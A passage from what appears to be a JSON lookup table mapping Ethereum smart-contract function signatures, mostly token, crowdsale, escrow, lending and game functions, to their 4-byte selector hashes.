"0xbba5b24e", "startPublicSale(uint256)": "0x74817d9b", "startPresale(uint256)": "0xa132aad1", "setTokenOffering()": "0x72dd236a", "addSingleApprovedAddress(address,address,uint8)": "0xea364a9a", "addApprovedAddresses(address[],uint8)": "0x5659856c", "Cherrio()": "0x23f4c025", "AllThingsTokens()": "0x2e541234", "BitBall()": "0xb2e235c2", "getRandomNumber()": "0xdbdff2c1", "Template()": "0x88026706", "QTUM()": "0xdec57e94", "_isValidDepositCountry(uint256,uint256,uint256)": "0xfbe9bb6d", "_couldWithdrawFromHolder(address,uint256)": "0xdf957b04", "_getParticipantRoles(address,address)": "0xf2b9f903", "_updateDepositCountry(uint256,uint256,uint256)": "0x40b5336d", "_updateWithdrawCountry(uint256,uint256,uint256,uint256)": "0x817afff8", "_updateCountries(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x810be182", "_isNoNeedInCountryLimitChange(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xfe168eef", "_isValidDepositCountry(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xcdbaed5a", "_isValidWithdrawLimits(uint256,uint256,uint256)": "0xf6261a0f", "_isTokenActive()": "0x4a62f5eb", "_contractFallbackERC223(address,address,uint256)": "0x9842692b", "initAtx(address,address,address,uint256)": "0x57163cc3", "ATxAsset()": "0x688a54dc", "WTF()": "0x158be5a2", "LanaCharleen8()": "0xadc1f702", "MockToken()": "0x65c7b711", "VT(uint256,string,string)": "0x9d8a18ea", "addCard(uint256,uint256,address)": "0xe4db2230", "setPresale(address)": "0xd5fcc7b6", "transferManual(address,uint256)": "0x9a31a5f0", "TrimpoToken(uint256,string,string,address,address,address)": "0x820447fc", "setDepositCreator(address)": "0xff18539b", "AspirationCoin()": "0x9ba58333", "EndRefund()": "0x8cf907fb", "StartRefund()": "0x38f46240", "ChangeEndByManager(uint256)": "0x2d85db6b", "ChangeStartByManager(uint256)": "0x928f0cc7", "ChangeCostByManager(uint256)": "0x7dd3cf54", "TRMToken(address,string,string,uint256,uint256)": "0xa0c32df7", "UvoCash()": "0x53c86cfc", "transferTokenContractOwnership(address)": "0x5f8162bb", "Taouaf(uint256,string,uint8,string)": "0x1bda8781", "ERC20Standard(uint256,string,string,bool)": "0x2d3b3141", "Clinicoin()": "0x7da7a437", "BTRL()": "0x99b4a0c6", "Gealena()": "0xa7365ea9", "StarxCoin()": "0x92956506", "mintWallets(address,address,address,address,address,address,address,address)": "0xedbea0b1", "ElepigToken()": "0xad7ed923", "DreamCoin(uint256,string,uint8,string)": "0x3feab517", "EUTBToken()": "0x5c0305ec", "mintOnDemand(address,uint256)": "0x428d5630", "setGoal(uint256)": "0x4b29c448", "RedFundCrowdsale(uint256,uint256,uint256,address,uint256)": "0x25280163", "LukaToken()": "0x9c166d31", "updateOwners(uint256,address[])": "0x5aa8a42c", "verifySignatures(uint8[],bytes32[],bytes32[],bytes32)": "0x62cdd872", "TransferableMultsig(uint256,address[])": "0x5a4537b0", "transferOwnership(uint8[],bytes32[],bytes32[],uint256,address[])": "0xe01060f8", "_createToken(string,bytes5,address,uint256)": "0x7ee42e6d", "TEACHToken()": "0x2a43b847", "playerRollDice(uint256,address)": "0xb1652b2f", "playerRollDiceSingle(uint256)": "0xccf64316", "encrypt(string)": "0x3a5b5bde", "setCaissa()": "0x82db9bd4", "LuckyETH()": "0x37323d19", "FUTURAX()": "0x47b82bec", "WBSToken()": "0x136c8744", "CBTSToken()": "0x0458996a", "setOldSeelToken(address)": "0xf9172266", "HitCash()": "0x63fdca37", "FruitionToken()": "0xe5cf45b0", "returnCoins(uint256)": "0xafa25098", "MMTOKEN()": "0x330fd319", "AirDrop(address[],uint256[])": "0x51524e5b", "CIBNLiveInteractiveToken()": "0x1d153624", "changeOverERC228(address,address,uint256,address)": "0xc97ec033", "ZONTEX()": "0x9f810510", "TokeniVOX(uint256,string,string)": "0xa83332d5", "SqueezeTheJuice()": "0xab65c534", "SDT(address)": "0xf52ff1da", "fundEscrow(address,uint256,uint256,uint256)": "0x301997ae", "createEscrow(address,address,uint256,uint256,uint256,uint256)": "0x069e5e53", "setEscrow(address,address)": "0x6e2857f2", "setPolls(address,address)": "0x264a3edc", "takeSnapshot(address)": "0x929911be", "requestSnapshots(uint256)": "0x35a1d95d", "SCCToken(address,address)": "0x0c798c81", "modifyPMTAccount(address)": "0x51aa0a30", "earlyStageLasts()": "0xab96dd18", "publicOfferingExchangeRate()": "0x64b2eb2c", "DEBUG_MODE()": "0x8638aa65", "cjTeamWallet()": "0xecb87dc4", "tokensHardCap()": "0xb5ab05a5", "ipoPlatformPercentage()": "0x100c6cfd", "saleWeiLimitWithoutKYC()": "0x3b42dfad", "icoThresholdBonus1()": "0xf113c854", "requestBuywithETH()": "0xddcd8763", "getCofounderCount()": "0x3cb83751", "totalTxFeePercent()": "0x4f9bf601", "teamSupply6Months()": "0xac5277a4", "checkIncentivisingBalance()": "0x6bf30259", "ENG()": "0xf1f33565", "moneyWallet()": "0xc0631b12", "GDCNumber2()": "0x56f2b308", "finney2LemoRate()": "0x53892496", "DEV_TEAM()": "0x87f503fd", "offerSigner()": "0x566bd6c3", "getWithdrawalAddress()": "0xec8f3fa5", "mintedtokens()": "0x17ac410f", "HaltTime()": "0x7dfbc19c", "tier3Total()": "0x48dfe175", "auctionEndPrice()": "0xa04a6ac8", "myInner1()": "0x7e85477f", "rounding()": "0x2e440403", "privateBonus()": "0x5a87053e", "promoMoney()": "0xad5a157d", "seedShare()": "0xe1d5ec4c", "registrationPeriod()": "0x5939ee04", "times_()": "0x04b02ed6", "donationReceiverLocked()": "0x23d1ab35", "test_suicide()": "0x1cbcc77c", "allowStart()": "0xdc9e9ba0", "halts()": "0xa5a899ec", "jingleContract()": "0xa82e3179", "ICO_TOKEN_SUPPLY_LIMIT()": "0x98e0fb08", "participatePresale()": "0xa2ab2686", "getValuableTokenAmount()": "0x60cce8a5", "nearestKnownBlock()": "0x78ca923d", "marketingAccount()": "0x83ac44e6", "redemption()": "0x5467e0a7", "startCrowdsalePhase3Date()": "0x79a88683", "_secondLevelEth()": "0x7ba36880", "fullname()": "0x8ef490ea", "valueAirDrop()": "0xf0109f84", "accountRegistryLogic()": "0x568531cc", "maxPurchaseSize()": "0x076736a2", "elcoin()": "0x7001a2a2", "individualCap()": "0x0276650b", "ico_address()": "0x182499fe", "TOKEN_RESERVE2_CAP()": "0x8d71f131", "PHASE1_SUPPLY()": "0x10a03b22", "ratePreICOEnd()": "0xa969574d", "returnPtSafeSmall()": "0x105541ae", "gy()": "0x2d58c9a2", "claimA()": "0xd0b74806", "loyaltyCap()": "0xfd7caf4d", "SimplePreTGEContract()": "0xce1a70a3", "EDU_PER_ETH_SALE()": "0x100f759f", "currentNumberOfRares()": "0xa528cb4f", "MAX_DAILY_COSIGN_SEND()": "0x66612f66", "preDuration()": "0x623d96ed", "payment_amount()": "0xa6066523", "ICO_CAP()": "0x04b1c6f0", "notUpgradableInStore()": "0x13754f9a", "ownerDeactivateToken()": "0xe4165e15", "pricingStrategy()": "0x78b99c24", "getStateInfo()": "0x80c81c16", "currentStageTokensBoughtByAddress()": "0xd042ce2c", "contributedUsd()": "0x6e2e9c3b", "paused_()": "0x8801b4fc", "_counter()": "0x7cd49fde", "unlockedAt()": "0x8cb1e9c1", "numsuccesses()": "0x4a943eb3", "teamPart()": "0xdd083f20", "maximumFee()": "0x35390714", "noFeesList()": "0x6d4717fe", "ANTS_TO_COLLECT_1ANTHILL()": "0xf31011ac", "worldCupResultPart1()": "0xd785c19c", "tokenTeamAllocated()": "0x80f4bcb8", "fundingMax()": "0x11566dd7", "weiICOMaximum()": "0xd6fea306", "startTimeStage1()": "0x9bb8fde4", "deedCount()": "0x41163f7c", "clearRAM()": "0xa740a6fa", "partnerETHRewardsPercent()": "0xd6b52d9a", "walletForETH()": "0x74ec8682", "holdingTaxDecimals()": "0xce1f561c", "minContribution_mBTC()": "0x48cfa939", "GOOD_ERC20()": "0x81cde1a9", "round3Sold()": "0x86d0b48c", "crowdsalePhase()": "0xa9f5de42", "winAmount4()": "0x25182e79", "RANGE_STAT_MAX()": "0xd0d9fcf7", "PotOwner()": "0x89c9e80f", "gameCollapse()": "0xbb7029a9", "ifEmergencyStop()": "0x137a1464", "totalContributedWei()": "0x32cb46e0", "MOM()": "0x86a4f6ee", "setKycAdmin(address)": "0x47722218", "rewardManual(address,uint256)": "0x13169ab7", "refuseAddress(address)": "0x896ed75a", "approveAddress(address)": "0xfabf657a", "buy(uint256,bytes)": "0x82189551", "setAgentAddress(address,address)": "0xe6a9627c", "updateTokenPriceProvider(address)": "0x2bc85d5d", "buyDirectInMarketplace(uint256)": "0x8f8db737", "setUnownedLifeRate(uint256,uint8)": "0x06f33ae2", "setUnownedNumOfExoTokensBonus(uint256,uint32)": "0x1d017b28", "setCryptoMatchValue(uint256,string)": "0x7dc45e27", "setUnownedNickname(uint256,string)": "0xe12925a9", "setUnownedName(uint256,string)": "0xa715df58", "setUnownedPriceInExoTokens(uint256,uint32)": "0xbd621042", "setUnownedPurchaseableMode(uint256,bool)": "0xe785daaf", "setUnownedPriceInEth(uint256,uint256)": "0x4777c1f4", "getNickname(uint256)": "0x34c2b620", "getPlanetName(uint256)": "0x62133a6c", "unownedPlanet(uint256)": "0x4932a80b", "_migrateExoplanet(uint256,string,uint256,uint32,string,uint32,uint8,string,address)": "0x804c7fa0", "migrateSinglePlanet(uint256,string,uint256,uint32,string,uint32,uint8,string,address)": "0x81bc3657", "getPurchaseableMode(uint256)": "0xf13b68e8", "setPurchaseableMode(uint256,bool,uint256)": "0x8bfff5a0", "setBuyDirectMode(bool,address)": "0x7be5b5ae", "turnMigrateOff()": "0xd19b99b5", "ChessLottery()": "0xcd7292a0", "GenkiProjectToken()": "0xb783969f", "FakeNewsToken()": "0xfbc80af6", "OpnMind()": "0x5652ced0", "paybackToOwner(address)": "0x9ef63e97", "London()": "0x2f381df0", "BBCC(uint256,string,uint8,string)": "0xd935e0a7", "MCBA(uint256,string,string,address)": "0x3a29c32e", "CloudCredit()": "0x588f27e6", "Testtoken5()": "0xcb19bf53", "forTesting()": "0x2a4f370f", "changeClientCategory(address,uint256)": "0x33324445", "addTokensToBank(address,uint256)": "0xa375de4f", "addClient(address,address,uint256)": "0x2b14b712", "addBank(address,address,uint256)": "0x52194acf", "GetLoanIdFromPortfolio(uint256,uint256)": "0x84d83f07", "countPortfolios(address)": "0xb85ea983", "buyPortfolio(address,uint256,uint256)": "0xe4c28308", "sellPorftolio(uint256,uint256)": "0xdfbe0587", "getPortfolioInfo(address,uint256)": "0x9d3de95a", "removeLoanFromPortfolio(uint256,uint256)": "0x98de921f", "addLoanToPortfolio(uint256,uint256)": "0x2dd854d4", "deletePortfolio(uint256)": "0x0a82fd1c", "createPortfolio(uint256)": "0x43b25452", "GetLoanInfo(uint256,bool)": "0x4d2ee8e7", "GetLoansLenght(bool)": "0x1744cfe4", "aproveLoan(uint256)": "0x03ae3ded", "SwitchLoanOwner(address,uint256)": "0xf31bac4d", "BuyLoan(address,uint256,uint256)": "0x1591dc6a", "SellLoan(uint256,uint256)": "0x5a182b8b", "findOutInterestByBank(uint256,uint256,uint256)": "0xa0cecb3b", "GetBankBalance()": "0x2f38262a", "ChangeInterest(uint256,uint256,uint256,uint256,bool)": "0xd1e83b8b", "payOffClientDebt(uint256,uint256)": "0x5fed22a4", "removeBankToken(uint256)": "0xc026327a", "GetClientCategory(address)": "0x2240b645", "getClientCategory()": "0xb617a4fd", "getLoanIDbyClient(uint256)": "0x8580b71b", "getLoansLengthByClient()": "0x2a29c8d9", "getClientBalance()": "0x25a9d450", "removeClientToken(uint256)": "0x9167c5ad", "findOutInterestByClientCategory(address,uint256,uint256)": "0x8f3e568a", "askForALoan(address,uint256,uint256)": "0xa9298848", "Wemark()": "0xe791b66c", "SetFreeQPY(uint256)": "0x9275ddd7", "SetupQPY(string,string,uint256,uint256,uint256,address,address,uint256)": "0xfb28be72", "QPay()": "0x0aafefb8", "cancelRefund(address)": "0x4ab89400", "setRefund(address)": "0x2d806cdd", "BitcoinSapphire()": "0x82cfee4d", "getInitials()": "0x45a1f1b9", "Volkscoin()": "0xbb602e80", "getShareToken()": "0x2bdb0d92", "XEN()": "0xc003598a", "_completeTask(uint256)": "0x5e64f392", "updateReleaseAmount()": "0x8f9b7eb7", "MoviePass(string,string,uint8,uint256)": "0xa7972a80", "batchCreateSingleSeedAuction(uint8[],uint8[],uint256[],uint256[],uint256[],uint256)": "0xb792d022", "updateBatchSupport(bool)": "0x362f74e7", "batchCancelSale(uint256[])": "0x553ec6be", "createSeedTeam(uint8,uint256[9],uint256[9])": "0x5da08c42", "batchAssetTransfer(address,uint256[])": "0x9a58c33d", "assetTransfer(address,uint256)": "0xe5d9dac4", "setNFTContractAddress(address)": "0x23949cd1", "_computeNextSeedPrice(uint256,uint256)": "0x53a94aa6", "createTeamSaleAuction(uint8,uint256[9],uint256,uint256,uint256)": "0x9951a2c8", "createPromoSeedAuction(uint8,uint8,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2598ab9d", "createSingleSeedAuction(uint8,uint8,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa29626c2", "withdrawSaleManagerBalances()": "0x74eb7c90", "userCreateSaleIfApproved(uint256,uint256,uint256,uint256)": "0x84ececf2", "createSale(uint256,uint256,uint256,uint256,address)": "0x72a1b73f", "_averageSalePrice(uint256,uint256)": "0x4fa4d01a", "_createTeamSale(uint256[9],uint256,uint256,uint256,address)": "0x9b901d00", "_createSale(uint256,uint256,uint256,uint256,address)": "0xc6ea3037", "_withdrawBalance()": "0xf4814444", "getMyStageBet(uint256,uint256,uint256)": "0x84d46860", "getGroupStatistic(uint256)": "0x9f19296b", "getGroupTeamInvest(uint256,uint256)": "0x697d1eaf", "getWinnerTeam(uint256)": "0xfb1ae783", "updateStartTimeManually(uint256,uint256)": "0x513419e3", "updateEndTimeManually(uint256,uint256)": "0x91039c83", "setGroupWinner(uint256,uint256[])": "0x913b1ecc", "betStage(uint256,uint256[])": "0xe4f26633", "addGroup(uint256,uint256,uint256)": "0xc754fc08", "initStage()": "0xe1097249", "getMyNmBet(uint256,uint256)": "0x5ef2c79a", "getTeamInvest(uint256,uint256)": "0x6000eb9f", "setWinner(uint256,uint256)": "0x68cbce31", "getMatchIndex(uint256)": "0xf956c139", "initNormal()": "0x530795fb", "getChStatus()": "0xefd0f455", "getDeepInfo(uint256)": "0xddef880f", "getCountryBet(uint256)": "0x553c02ec", "BetChampion(uint256)": "0x0db38f66", "getChampion()": "0x11463a01", "setChampion(uint256)": "0x01c1c877", "InitCountry(uint256,uint256)": "0x26452036", "setClamTax(uint256)": "0x8d81a1ce", "EduCloud()": "0x25cf98e5", "TCDC()": "0xdc3c39aa", "JZCoin()": "0xe9d1e422", "MicoinNetworkToken(uint256,string,string)": "0xc443a99a", "ArticCoin(uint256,string,string)": "0xd4683f6d", "GRUToken()": "0xbab25514", "Multiexshares()": "0x7d459c71", "SDAToken()": "0x41a461fb", "getWhitelistAt(uint256)": "0xe93ba06f", "getWhitelistTotal()": "0xee6392ce", "setWhitelistAgent(address)": "0xb7d3a9c9", "isOnWhitelist(address)": "0x3a3ab672", "extendLockPeriods(uint256,bool)": "0x5e4f63ec", "setGrantsUnlock(uint256,bool)": "0x0eaee52c", "setPartnersRelease(uint256)": "0xdeff5757", "setPublicRelease(uint256)": "0xc50be16c", "removePartner(address)": "0xea3c281a", "QwasderToken()": "0x63ba26fa", "LuckToken()": "0x704691e1", "UnicornManagement(address)": "0xca94a927", "cancelEscrow(bytes20)": "0xd9da0142", "releaseEscrow(bytes20,address)": "0x6cbb9d19", "startEscrow(bytes20,address,uint256)": "0x9f6822b4", "Airchain(uint256,string,uint8,string)": "0x7cb5d0ef", "deploy(uint256,bytes)": "0x61ff715f", "allMultitokens()": "0xc30b06e8", "NINECOINTOKEN()": "0x1427407f", "EssentiaToken()": "0xc0a2d9b3", "GreeningDesertChainToken()": "0x9dc90bd8", "JapanvsPoland()": "0x3836d3f4", "handleETH(address)": "0x06eb815f", "process(address)": "0xb9e6152b", "setEncryptContract(address)": "0xf2fdddf4", "BUYER_CHECK_STEP(bytes32)": "0xf749bdc1", "SELLER_CHECK_STEP(bytes32)": "0xeda09d80", "BUYER_STEP_5_CANCEL(bytes32)": "0x6ac0fe25", "BUYER_STEP_4(bytes32,uint256,bytes1,address)": "0x3de8c792", "BUYER_STEP_3(bytes32,uint256)": "0x07939a17", "BUYER_STEP_2(bytes32)": "0x51d75dc6", "BUYER_STEP_1(bytes32)": "0xcb93abb2", "SELLER_STEP_4_ACCEPT(bytes32)": "0xef7293d7", "SELLER_STEP_2_GET_PASS()": "0xdd4aac73", "SELLER_STEP_1_OPEN()": "0x63cbab8c", "setEthPricies(uint8)": "0x6bfe6bc0", "ethBaseBalance(address)": "0xbb9e1edc", "ethContractBalance()": "0xe930f3a6", "ethBalance(address)": "0xd8f3790f", "replenishTokens(address,uint256)": "0x2edb5389", "replenishEth()": "0xd7edf88c", "sellAth(uint256)": "0x3f5f5217", "encryptCounter(uint256)": "0x2d1b42f5", "AthTokenBase()": "0x3727ae2d", "HomeToken(string,string,uint8,uint256)": "0xaf263ec9", "BurnableCrowdsaleToken(string,string,uint256)": "0xc9a30482", "setMintAgent(address,address)": "0xa7728589", "mintToAddress(uint256,address)": "0x512b658d", "CrowdsaleToken(string,string,uint256)": "0xfd8be237", "burnAllOwnerTokens()": "0xe94200f1", "isAddressValid(address)": "0xcf31ff86", "TelegramOpenNetworkContract()": "0x8c2d396f", "TonToken()": "0x84f88cbf", "TelegramOpenNetwork()": "0x76edc29d", "EtownCoinTest(uint256,string,uint8,string)": "0xe463b659", "VOODOO()": "0xceab4ea7", "BurnTokensFrom(address,uint256)": "0x52d4747f", "PayForServiceCHL(uint256)": "0xbbef86b8", "PayForServiceETH()": "0xd57c00de", "TransferSellAgentCreators(address,uint256)": "0xdcda2385", "TransferSellAgentBounty(address,uint256)": "0xce9fb088", "TransferSellAgentSiteRegMulti(address[],uint256)": "0x38cd2c1a", "TransferSellAgentSiteReg(address,uint256)": "0xbf2c3dad", "TransferSellAgentMulti(address[],uint256)": "0x064da642", "TransferSellAgent(address,uint256)": "0x0ee7f045", "UpdateRateAgent(address,address)": "0x16ae7944", "UpdateAddressPayForService(address,address)": "0x349fcf85", "UpdateSellAgentCreators(address,address)": "0x32aa952f", "UpdateSellAgentBounty(address,address)": "0xa45563ed", "runsOutOfGas()": "0x2928859c", "triggerAssertError()": "0x53511819", "triggerRequireError()": "0x0496e9ae", "isValidSignatureAndData(address,address,bytes)": "0x0298d557", "isValidSignatureAndMethod(address,address,bytes)": "0xef31bfd1", "errorWithMessage()": "0xcd4aed30", "error()": "0xc79f8b62", "alwaysReverts(uint256)": "0x3405deed", "performAction(address,bytes,uint256)": "0xb9f48cad", "createPool(address,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x197c0f3d", "fail(uint256)": "0x132e4f3c", "setIcoAddress(address,uint256)": "0xb510dc2a", "setToken(address,uint256)": "0x78bf2b53", "sendFunds(uint256)": "0x8b281018", "claimRefund(uint256)": "0x5b7baf64", "refundAvailable(address)": "0x6a9412bd", "tokensAvailable(address)": "0xc902ee36", "contractTokensTotal()": "0x259ceee5", "contractTokensAvailable()": "0x6e125009", "buyMessage(bytes32,uint256,string)": "0x2b4f79b3", "changeWithRef(address,address,uint256,uint256,address)": "0x17974399", "setRefferalFee(uint256)": "0x17986d83", "setChangeFee(uint256)": "0xc108adab", "setLendFee(uint256)": "0xdf1614cf", "sendEthProportion(address,bytes,uint256,uint256)": "0x846f1185", "sendEthValue(address,bytes,uint256)": "0xd2e9236b", "externalCall(address,uint256,bytes,uint256,uint256)": "0xbbfe6b75", "denyChangesMultitoken(uint256)": "0x50a13702", "allowBundlingMultitoken(uint256)": "0xbee11672", "denyBundlingMultitoken(uint256)": "0xc9c09ac8", "deleteMultitoken(uint256)": "0xe770390d", "allWalletBalances(address)": "0x0d0cd4f4", "changeWeight(address,address,uint256,uint256)": "0x8e84844e", "getAmountsForChangeWeight(address,address,uint256)": "0xd869d86d", "scaleWeights(uint256)": "0x182d709a", "unlockTokenForExchange(address)": "0xee2ee146", "lockTokenForExchange(address)": "0xe3f9cd17", "_bundle(address,uint256,uint256[])": "0x8eeb5073", "allowBundling()": "0x67bb474f", "denyBundling()": "0xc46b2d9d", "unbundle(address,uint256)": "0xb4dc3dc7", "bundle(address,uint256)": "0xeba3cdfe", "bundleFirstTokens(address,uint256,uint256[])": "0x22393ef4", "allTokensDecimalsBalances()": "0x34f6bef3", "allDecimals()": "0xfc03441c", "denyChanges()": "0xe064c1ec", "allTokensDecimalsBalancesWeights()": "0xb36216d3", "unlock(bytes16)": "0xe1afb08c", "verifyProofOfTransitionAgreement(address,uint64,uint256,bytes32,uint256[2],bool,bytes32,bytes32,uint8)": "0xc2bdb862", "checkpoints(uint256)": "0xb8a24252", "getLiveChallenges(uint256)": "0xb48d323f", "deposits(uint256)": "0xb02c43d0", "submitDeliveryCommitment(address[2],uint32,uint64[3],bytes32[],bytes32,uint256[2],uint256,bytes32,bytes32,uint8)": "0xaf6972c0", "answerDeliveryChallenge(address[2],uint64,bytes32[],uint256[],uint256[2],uint256[2],uint256,bytes32[3],uint8,bytes32[])": "0xad994621", "genesis()": "0xa7f0b3de", "verifyProofOfMembershipInternal(uint256,bytes32[],bytes32,bytes32)": "0x9c38019b", "hasOutstandingChallenges()": "0x98e73df9", "recordBook(address)": "0x91e569c3", "signedMessageECRECOVER(bytes32,bytes32,bytes32,uint8)": "0x8e9f9072", "verifyProofOfStakeInternal(uint256,bytes32,bytes32,uint256,bytes32[],uint256[],uint256,uint256)": "0x8caaab4d", "submitInitialEmptyState(bytes32,uint64,uint256[2],bytes32,bytes32,uint8)": "0x8982d772", "requestWithdrawal(bytes32,uint64,bytes32[],uint256[],uint256[2],uint256)": "0x85f671a6", "verifyProofOfStake(address,bytes32,uint64,uint256,bytes32[],uint256[],uint256,uint256)": "0x758f39b8", "recoverOnlyOnChainFunds()": "0x7548014d", "SLACK_PERIOD()": "0x608cb457", "challengeBook(address,address)": "0x5f3c6686", "submitInitialMerkleState(bytes32,uint64,bytes32[],uint256[],uint256,uint256,bytes32,uint256[2],bytes32,bytes32,uint8)": "0x4fe0ff1a", "getPendingWithdrawals(uint256)": "0x44f9ac5c", "EXTENDED_SLACK_PERIOD()": "0x390e16c1", "confirmWithdrawal()": "0x359f517e", "doNothing()": "0x2f576f20", "DEPOSITS_KEPT()": "0x2d60a72c", "hasMissedCheckpointSubmission()": "0x2bd71875", "getDepositAggregate(address,uint256)": "0x21335ad5", "BLOCKS_PER_ROUND()": "0x0cc73b6a", "recoverAllFunds(bytes32,uint64,bytes32[],uint256[],uint256[2])": "0x082346d9", "ROUNDS_KEPT()": "0x0039ad6d", "sendAll()": "0xe14f680f", "func_1()": "0x3f7eb0fe", "executeOrder(bool,address[3],uint256[4],uint256,uint8,bytes32,bytes32)": "0xcc05d836", "cb0f5ef7()": "0x299453ca", "b531647b()": "0xcc328f2f", "bbd36484()": "0xcf9ac928", "d27d7bad()": "0x81c56dfb", "e6c65e93()": "0x8c0b372d", "eeeeeeeeeeeee()": "0x5f1d146e", "eeeeeeeeeeee()": "0xe4569c4e", "IcapTransfer(bytes32,address,bytes32,uint256)": "0x260c3af1", "Transfer(bytes32,address,uint256)": "0x4c13017e", "Deposit(address,bytes32,uint256)": "0x19dacbf8", "AnonymousDeposit(address,uint256)": "0xceaafb67", "sendDividend()": "0xc678e618", "participantBonus(address)": "0x085d9335", "registerParticipant()": "0xccfc811b", "setTotalUsdAmount(uint256)": "0x5e3cb7b0", "computeTotalEthAmount()": "0x9daf9ce3", "participantsCount()": "0xdd60c898", "VanityCrowdsale(uint256,uint256,address)": "0x21a32e5c", "executeOrder(uint256)": "0x94f61134", "executeOrder2(uint256)": "0xc5fee757", "rateUSDcETH()": "0xc49589bb", "_promo()": "0x423fcd5e", "_batch2_icosaleEndTimestamp()": "0x62b6a963", "totalEthxRecieved()": "0x5bab1a63", "fiveHourCap()": "0x55923471", "icoEtherReceivedPreSecondSale()": "0x35493e98", "coinPercentage()": "0x72f6c3b5", "totalInvest()": "0x616b40e3", "totalTokenSaled()": "0x6af91799", "TEST_HOUSE()": "0x8a25aefa", "areTokensUnlocked()": "0x00862c3c", "jokerAddress()": "0xe349f108", "ListValidated()": "0x7f2e01fb", "numModules()": "0x8ac341c6", "noToken()": "0x11a9f10a", "RED()": "0x36d18b67", "abstractENS()": "0xc12c2eb3", "_myTokeName()": "0x8a3db05f", "reminder()": "0x0209f982", "accountBuyLimit()": "0xdf9d3580", "multiSig()": "0x36e0004a", "GOOLA_UNIT()": "0x172b319d", "currentSmartSpeedNumber()": "0xcfbb2047", "isSellPossible()": "0x442d0927", "tokenEmail()": "0x788222ae", "ThirdBonus()": "0x0467c3ff", "recieveFunds()": "0xbaba4811", "summFutureInvest()": "0x3b0363fa", "reservePart()": "0x81a22bee", "PriceDecimals()": "0xb0175308", "DEV_TEAM_STAKE()": "0x000150a0", "nextlotnr()": "0x33d34bad", "STARTING_TIME()": "0xabc63d00", "serviceStation()": "0x12df2f49", "claimE()": "0x497cc504", "paladinAddress()": "0x63875261", "clearJackpotParticipantsAfterDistribution()": "0x18501714", "icoEndTimestampStage3()": "0x2ab76377", "presaleEndtime()": "0x353edf58", "switchOFFfreeForAll()": "0x8ec49939", "lastKing()": "0xf238683f", "firstWeekMainICOBonusEstimate()": "0x6ca100fb", "MAX_TOKEN_REWARDS()": "0x27ae587c", "marketStatus()": "0xe0e081d7", "primaryListing()": "0x42a657fd", "fmpContractAddress()": "0x54b49859", "halvingInterval()": "0x6a47aa06", "lastWiningTicketNumber()": "0x3ccc8193", "users()": "0xf2020275", "CurrentDevFee()": "0x1ab12b10", "totalPresaleBase()": "0xa09b7e2b", "icoContractAddress()": "0x9fe17cc2", "getBOPCount()": "0xf5196002", "kMinStake()": "0x6660b210", "THIRD_USER_CUT()": "0xc7586cde", "bonus_received()": "0x8d521149", "logSendEvent()": "0x29f62f70", "isIcoEnded()": "0xba7e424d", "totalSellOrders()": "0xdd48d911", "resetVoteKindnessEvery()": "0xada1a34b", "relayerName()": "0xe12bcd68", "AUDITED_AND_APPROVED()": "0x21861cce", "factorial()": "0x981111ef", "securityTokensWallet()": "0xccdbbff5", "multisigDXF()": "0xb1d1fed9", "DEFROST_FACTOR_TEAMANDADV()": "0xcc81dbb5", "HARDCAP_ETH_LIMIT()": "0xe6456a30", "ADDR_MAYA_ASSOCIATION()": "0x4b81780e", "timeLockedStart()": "0xf9f0507f", "VUP_PER_ETH_ICO_TIER3_RATE()": "0x9e34ba2f", "deposit_dividends()": "0x5a64b786", "amountOfUnitsOutsideAdminWallet()": "0x1b5e42f5", "acceptColuLocalNetworkOwnership()": "0xb3b4ec54", "ADX()": "0xdcea0a64", "bonusCalculationFactor()": "0xc8a71e14", "gameManagerPrimary()": "0x7bf3f900", "currentProfitPct()": "0x8e47dd03", "preSaleMinAmount()": "0x818a4b48", "assetSize()": "0x5cd925cd", "accuracy()": "0x83835c01", "ledgerName()": "0xcf1f3dd7", "passFoundation()": "0x2fd3bd2e", "tokenTarget()": "0x782e1e6c", "lastFunder()": "0xd77a80a8", "TIER2_BONUS()": "0x3a6f85b1", "totalEthDeposited()": "0xeae6754a", "NCPTokenDeposit()": "0x53462fd8", "allowBurns()": "0xc8a83384", "lastLevelChangeBlock()": "0x87bd499b", "eventWebsite()": "0x169a7c3a", "pauseReason()": "0x04caa6dd", "max_schrems_addr()": "0xa6ee6fd9", "BalancesInitialised()": "0x902c0dcc", "PURCHASE_AMOUNT_CAP()": "0x5c7fe08e", "getApplicationState()": "0x70c0f689", "totalInvestedWithBonuses()": "0x5b3a4895", "Withdraw_5()": "0xcc6e6f25", "whiteListEndTime()": "0xdf90c98d", "fourthWeekTokenPrice()": "0xb885acd8", "BONUS_PRE_ICO()": "0x51a9111a", "Orocoin()": "0xfd23022a", "RHC()": "0x1998a5c4", "GCOXOWNToken(string,string,uint8,uint256)": "0x2f72d697", "CoreToken(uint256,string,string,uint8)": "0x14946a97", "_contains(address[],address)": "0x9052b3d5", "_collectFee(address,address,uint256)": "0x4d130e64", "setWhitelist(address[])": "0xf4217648", "_updateCommission(uint256)": "0x217aab68", "resetCommission()": "0x0845817c", "setCollector(address)": "0xfb5b82d0", "TransferCommissionToken(uint256)": "0x2efcb5e0", "YudiToken(uint256,string,string)": "0xec61c430", "GSY(uint256,string,string)": "0x91f3c4a2", "RBOC()": "0x13943033", "isOMITokenContract()": "0x32366ea5", "OMIToken()": "0xde8a1c2e", "_release(address)": "0x3183ef3d", "releaseTokensByAddress(address)": "0x2d76d7b0", "lockTokens(address,uint256,uint256)": "0xa25983e5", "revokeLockByIndex(address,uint256)": "0x8cc5e56e", "getLockByIndex(address,uint256)": "0x1374eb6f", "getNumberOfLocks(address)": "0xef79a35f", "setAllowanceAddress(address)": "0x08f53f44", "isOMITokenLockContract()": "0x72bc8ff2", "OMITokenLock(address,address)": "0xc71bee4c", "_finalization()": "0x1ab8ff3b", "getPurchaseRecord(address)": "0x76e75e05", "setUSDRaised(uint256)": "0x9348ff61", "isOMICrowdsaleContract()": "0xfd4eeb8f", "OMICrowdsale(uint256,address,address,address)": "0xd0617f2f", "FC1Token()": "0x68583bc0", "SLP()": "0x2509f1b9", "_handleEnergyTopup(address,uint256,uint256)": "0xb756919d", "adventureByToken(address,uint256,uint256,uint256,uint64,uint64)": "0xfba70381", "topupEnergyByToken(address,uint256,uint256)": "0xc4021c13", "makeBatchPayment(address[],uint256[])": 